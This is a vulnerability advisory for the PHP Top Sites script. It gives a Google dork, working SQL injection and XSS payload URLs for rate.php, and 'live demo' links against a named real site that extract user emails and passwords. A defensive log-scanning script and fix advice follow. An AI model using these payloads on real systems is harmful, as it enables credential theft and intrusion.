<------------------- header data start ------------------- >
#############################################################
PHP Top Sites Multiple SQL/XSS Vulnerability
#############################################################
# Author : kAsvææ | c0de Hunters
# Name : PHP Top Sites
# Bug Type : SQL/XSS
# Version :All
# Google Dork:"Powered By PHP TopSites"
# Home Page : http://itop10.net/
# You can download it : http://webscripts.softpedia.com/script/Top-Sites/PHP-TopSites-41994.html
#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >

SQL : "rate.php" (String SQL Injection)
[EXPLOIT] : rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x

XSS : "rate.php"
[EXPLOIT] : rate.php?site="'>
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=%22%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

< -- bug code end of -- >
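
Added example, not part of the original advisory: a detection check for web access logs that URL-decodes the "site" parameter of rate.php requests and flags values shaped like the two requests above. It assumes legitimate "site" values are plain numeric ids and that logs use the combined log format; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption (not from the advisory): a legitimate site value is a numeric id.
VALID_SITE = re.compile(r"\d{1,10}")
# Keywords and quote-breakout shapes seen in the advisory's SQL request.
SQLI = re.compile(r"(?i)\bunion\b.+\bselect\b|group_concat\s*\(|\b(?:and|or)\b\s+'")
# Markup characters seen in the advisory's XSS request.
XSS = re.compile(r"[<>]")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_site(value):
    """Return labels for one URL-decoded site value (empty set if benign)."""
    if VALID_SITE.fullmatch(value):
        return set()
    labels = {"non-numeric"}
    if SQLI.search(value):
        labels.add("sqli")
    if XSS.search(value):
        labels.add("xss")
    return labels

def scan(lines):
    """Return [(line_no, labels)] for rate.php requests with a suspicious site."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/rate.php"):
            continue
        # parse_qs percent-decodes, so encoded quotes and tags are matched decoded.
        for value in parse_qs(url.query, keep_blank_values=True).get("site", []):
            labels = classify_site(value)
            if labels:
                findings.append((n, labels))
    return findings

# Constructed sample access-log lines (documentation IP range, shortened payload).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /topsites/rate.php?site=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20null,null%20and%20%27x%27=%27x HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /topsites/rate.php?site=%22%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E HTTP/1.1" 200 700',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /topsites/index.php?site=%27 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for n, labels in scan(SAMPLE_LOG):
        print(n, sorted(labels))
```

The same numeric-id check, applied in rate.php before the value reaches the query or the page, together with a parameterized query and HTML-encoding on output, closes both issues at the source.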